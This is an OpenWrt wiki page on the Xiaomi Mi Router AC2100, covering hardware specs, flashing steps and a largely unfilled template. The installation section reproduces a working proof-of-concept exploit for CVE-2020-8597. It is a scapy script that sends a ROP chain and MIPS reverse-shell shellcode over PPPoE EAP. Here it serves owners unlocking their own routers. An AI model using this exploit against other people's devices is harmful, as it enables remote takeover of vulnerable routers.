Sidebar
toh:xiaomi:xiaomi_mi_router_ac2100
Table of Contents
Xiaomi Mi Router AC2100
The Xiaomi Mi Router AC2100 is a wireless router with MT7621 platform. From a technical standpoint, the spec of Xiaomi Mi Router AC2100 is highly identical to Redmi AC2100. It runs Xiaomi Router firmware by default and similarly, it requires a simple PPPOE exploit to start a shell and flash OpenWRT via command line interface.
Supported Versions
Experimental Versions
None at this time.
Hardware Highlights
| Model | Version | SoC | CPU MHz | Flash MB | RAM MB | WLAN Hardware | WLAN2.4 | WLAN5.0 | 100M ports | Gbit ports | Modem | USB |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Mi Router AC2100 | MediaTek MT7621A | 880 | 128NAND | 128 | MediaTek MT7603, MediaTek MT7615 | b/g/n | a/n/ac | - | 4 | - | - |
Installation
Software Preparation
- Two ethernet cables
- Python 3 installed on your PC
- Download OpenWrt firmware from this page
- A script that implements CVE-2020-8597 (see below)
An POC of CVE-2020-8597, from GitHub Gist
from scapy.all import *
from socket import *
interface = "enp0s31f6"
def mysend(pay,interface = interface):
sendp(pay, iface = interface)
def packet_callback(packet):
global sessionid, src, dst
sessionid = int(packet['PPP over Ethernet'].sessionid)
dst = (packet['Ethernet'].dst)
src = (packet['Ethernet'].src)
# In case we pick up Router -> PPPoE server packet
if src.startswith("88:c3:97") :
src,dst = dst,src
print("sessionid:" + str(sessionid))
print("src:" + src)
print("dst:" + dst)
def eap_response_md5():
md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10"
# Reverse shell, connect to 192.168.31.177:31337
stg3_SC = b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01"
reboot_shell = b"\x23\x01\x06\x3c"
reboot_shell += b"\x67\x45\xc6\x34"
reboot_shell += b"\x12\x28\x05\x3c"
reboot_shell += b"\x69\x19\xa5\x24"
reboot_shell += b"\xe1\xfe\x04\x3c"
reboot_shell += b"\xad\xde\x84\x34"
reboot_shell += b"\xf8\x0f\x02\x24"
reboot_shell += b"\x0c\x01\x01\x01"
#Debug sleep
#s0 = b"\x00\x00\x00\x00"
#s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
#s2 = b"\x03\x00\x00\x00"
#s3 = b"\x01\x00\x00\x00"
#s4 = b"\x0c\x93\x40\x00"
#s5 = b"\x00\x00\x00\x00"
#Debug reboot
#s0 = b"\x00\x00\x00\x00"
#s1 = b"\xB0\x9B\xEB\x77" # uclibc reboot(s2) base + 0xfbb0 = 77EB9BB0
#s2 = b"\x67\x45\x23\x01"
#s3 = b"\x01\x00\x00\x00"
#s4 = b"\x0c\x93\x40\x00"
#s5 = b"\x00\x00\x00\x00"
#ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9
s0 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
s1 = b"\x01\x00\x00\x00"
s2 = b"\x41\x41\x41\x41"
s3 = b"\x00\x64\xFF\x7F" # 7ffd6000-7fff7000 rwxp 00000000 00:00 0 [stack]
s4 = b"\x88\xe1\x40\x00" # pppd.txt:0x0040e188
s5 = b"\x00\x00\x00\x00"
ra = b"\x0C\x81\xF1\x77" # libuClibc.txt:0x0006e10c 77F1810C
rop_chain = (b'A' * 0x184)
rop_chain += s0
rop_chain += s1
rop_chain += s2
rop_chain += s3
rop_chain += s4
rop_chain += s5
rop_chain += ra
# Nop slide
rop_chain += (b'\x00' * 0x100)
# Small reboot shellcode for testing
#rop_chain += reboot_shell
rop_chain += stg3_SC
# Just padding the end a little, since the last byte gets set to 0x00 and not everyone uses a 4 * 0x00 as nop
rop_chain += (b'\x00' * 0x4)
pay = Ether(dst=dst,src=src,type=0x8864)/PPPoE(code=0x00,sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100,value=md5,optional_name=rop_chain)
mysend(pay)
if __name__ == '__main__':
sniff(prn=packet_callback,iface=interface,filter="pppoes",count=1)
eap_response_md5()
Enter values for “FILL-IN” below
| Bootloader tftp server IPv4 address | FILL-IN |
|---|---|
| Bootloader MAC address (special) | FILL-IN |
| Firmware tftp image | Latest OpenWrt release (NOTE: Name must contain “tftp”) |
| TFTP transfer window | FILL-IN seconds |
| TFTP window start | approximately FILL-IN seconds after power on |
| TFTP client required IP address | FILL-IN |
Upgrading OpenWrt
These are generic instructions. Update with your router's specifics.
LuCI Web Upgrade Process
- Browse to
http://192.168.1.1/cgi-bin/luci/mini/system/upgrade/LuCI Upgrade URL - Upload image file for sysupgrade to LuCI
- Wait for reboot
Terminal Upgrade Process
If you don't have a GUI (LuCI) available, you can alternatively upgrade via the command line. There are two command line methods for upgrading:
sysupgrademtd
Note: It is important that you put the firmware image into the ramdisk (/tmp) before you start flashing.
sysupgrade
- Login as root via SSH on 192.168.1.1, then enter the following commands:
cd /tmp wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc sysupgrade /tmp/xxx.abc
mtd
If sysupgrade does not support this router, use mtd.
- Login as root via SSH on 192.168.1.1, then enter the following commands:
cd /tmp wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc mtd write /tmp/xxx.abc linux && reboot
Debricking
Failsafe mode
Basic configuration
→ Basic configuration After flashing, proceed with this.
Set up your Internet connection, configure wireless, configure USB port, etc.
Specific Configuration
Please fill in real values for this device, then remove the EXAMPLEs
Network interfaces
The default network configuration is:
| Interface Name | Description | Default configuration |
|---|---|---|
| br-lan | EXAMPLE LAN & WiFi | EXAMPLE 192.168.1.1/24 |
| vlan0 (eth0.0) | EXAMPLE LAN ports (1 to 4) | EXAMPLE None |
| vlan1 (eth0.1) | EXAMPLE WAN port | EXAMPLE DHCP |
| wl0 | EXAMPLE WiFi | EXAMPLE Disabled |
Switch Ports (for VLANs)
Please fill in real values for this device, then remove the EXAMPLEs
Numbers 0-3 are Ports 1-4 as labeled on the unit, number 4 is the Internet (WAN) on the unit, 5 is the internal connection to the router itself. Don't be fooled: Port 1 on the unit is number 3 when configuring VLANs. vlan0 = eth0.0, vlan1 = eth0.1 and so on.
| Port | Switch port |
|---|---|
| Internet (WAN) | EXAMPLE 4 |
| LAN 1 | EXAMPLE 3 |
| LAN 2 | EXAMPLE 2 |
| LAN 3 | EXAMPLE 1 |
| LAN 4 | EXAMPLE 0 |
Buttons
→ hardware.button on howto use and configure the hardware button(s). Here, we merely name the buttons, so we can use them in the above Howto.
Please fill in real values for this device, then remove the EXAMPLEs
The Xiaomi Xiaomi Mi Router AC2100 has the following buttons:
| BUTTON | Event |
|---|---|
| EXAMPLE Reset | reset |
| EXAMPLE Secure Easy Setup | ses |
| EXAMPLE No buttons at all. | - |
Hardware
Info
- This table is automatically generated, once the correct filters for Brand and Model are set.
- If you see “Nothing.” instead of a table, please edit this section and adjust the filters with the proper Brand and Model. Just try, it's easy.
- If you still don't see a table here, or a table filled with '¿': Is there already a Techdata page available for Xiaomi Xiaomi Mi Router AC2100 ? If not: Create one.
- If you see a table with the desired device data, everything is OK and you can delete this text and the
<WRAP>that encloses it. - If it still doesn't work: Don't panic, calm down, take a deep breath and contact a wiki admin (tmomas) for help.
Nothing.
Photos
Front:
Insert photo of front of the casing
Back:
Insert photo of back of the casing
Backside label:
Insert photo of backside label
Opening the case
Note: This will void your warranty!
Describe what needs to be done to open the device, e.g. remove rubber feet, adhesive labels, screws, …
- To remove the cover and open the device, do a/b/c
Main PCB:
Insert photo of PCB
Serial
→ port.serial general information about the serial port, serial port cable, etc.
How to connect to the Serial Port of this specific device:
Insert photo of PCB with markings for serial port
Replace EXAMPLE by real values.
| Serial connection parameters for Xiaomi Xiaomi Mi Router AC2100 @@Version@@ | EXAMPLE 115200, 8N1 |
|---|
JTAG
→ port.jtag general information about the JTAG port, JTAG cable, etc.
How to connect to the JTAG Port of this specific device:
Insert photo of PCB with markings for JTAG port
Bootloader mods
Hardware mods
None so far.
Bootlogs
OEM bootlog
COPY HERE THE BOOTLOG WITH THE ORIGINAL FIRMWARE
OpenWrt bootlog
COPY HERE THE BOOTLOG ONCE OPENWRT IS INSTALLED AND RUNNING
Notes
Space for additional notes, links to forum threads or other resources.
- …
Tags
Add tags below, then remove this fixme.
toh/xiaomi/xiaomi_mi_router_ac2100.txt · Last modified: 2020/07/15 09:57 by s_alyssa
Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 4.0 International
